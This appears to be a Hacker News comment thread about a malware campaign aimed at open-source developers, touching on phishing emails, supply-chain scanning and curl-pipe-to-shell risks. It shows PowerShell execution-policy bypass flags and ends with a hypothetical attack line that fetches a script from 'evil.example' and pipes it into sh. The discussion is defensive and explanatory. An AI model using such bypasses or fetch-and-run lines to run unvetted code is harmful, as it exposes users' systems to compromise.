Open-source developers are understandably high value targets, but I'd imagine they're harder to hit with this kind of attack.
If I was some evil-doer though I'd develop some marketing heavy Javascript/Rust/language-of-the-week framework, hit HN frontpage and have the call-to-action copy be:
This is not a security feature, and should not be relied upon.
For example, unelevated users can run the following command:
'PS> Set-ExecutionPolicy Bypass -Scope Process' to allow script execution in the current powershell process.
Also, you can pass complete powershell scripts over the command line which bypasses the script restriction (because you can just input your entire script over the command line).
This is done with the -E (-EncodedCommand) flag. Which takes a base64 encoded string with statements separated by semi-colons.
That's true, but it's not unreasonable to foresee the creators making OSX/Linux versions too if these Windows ones "go ok" from their point of view. :(
What's worrying to me is the wording of the emails themselves. It's much better, and more likely appearing "legit" than the vast multitude of scam/trojan/similar .pdf/.xls/.doc/.lnk/etc emails I've seen. (several a day generally)
With the now current curl | sh pattern, one just needs some MTM attack, or even just trick someone to do it, as the majority never look to the contents of the shell script.
Which is why it could only be done in a vm. VM breakout is still a risk but at the end of the day it's only ever about mitigation not panacea. A startling number of people use this method too what with the plethora of package managers available. The evildoer's best friend laziness - just keeping going longer than someone on average would reasonably expect you to, i.e. not very.
I've been worrying about this for some time, I regularly get customers sending screenshots inside Word documents, a well targeted email could easily get past my defences.
This is why most companies have a build step in their CI/CD pipeline that scans for CVE/malware in their app's dependencies (jar, npm packages, Ruby gems etc)
While the concept sounds sound, so far I've never actually seen this setup in the real world. Do you happen to have any resources on how to properly setup such a step in a CI tool?
Check out software like Twistlock, Sonatype and I think Tennable has a scanner as well that integrates into the pipeline. If your are not using Sonatype to build you can find good support for this in Jenkins or Team City via a plugin
(Full disclosure, I work in this area)
Submitters: please submit original sources, as the site guidelines ask (https://news.ycombinator.com/newsguidelines.html). Myriads of blog posts and articles mostly just point to something else; be a good HN submitter and do the pointer traversal for the rest of us.
In all honesty, Ars does a real value-add in this case. I'm an open source developer on Windows so this feels relevant, but the original article forces me to read through a very long, highly technical article full of HTTP logs and hex dumps just to find out how this could impact me. About halfway through I gave up and then I was happy I found your comment with the Ars link.
I submitted the Ars one instead of the original source, as the Ars one is much more approachable than the original source, and I didn't see the previous submission. Which is weird, as I searched first. Bad me. :/
That being said, the PAN post definitely has the better detail once a person grok's what it's about. :)
If I was some evil-doer though I'd develop some marketing heavy Javascript/Rust/language-of-the-week framework, hit HN frontpage and have the call-to-action copy be:
> Install in picoseconds!
> curl -sf http://evil.example/evil_install.sh | sh
edit: corrected hypothetical attack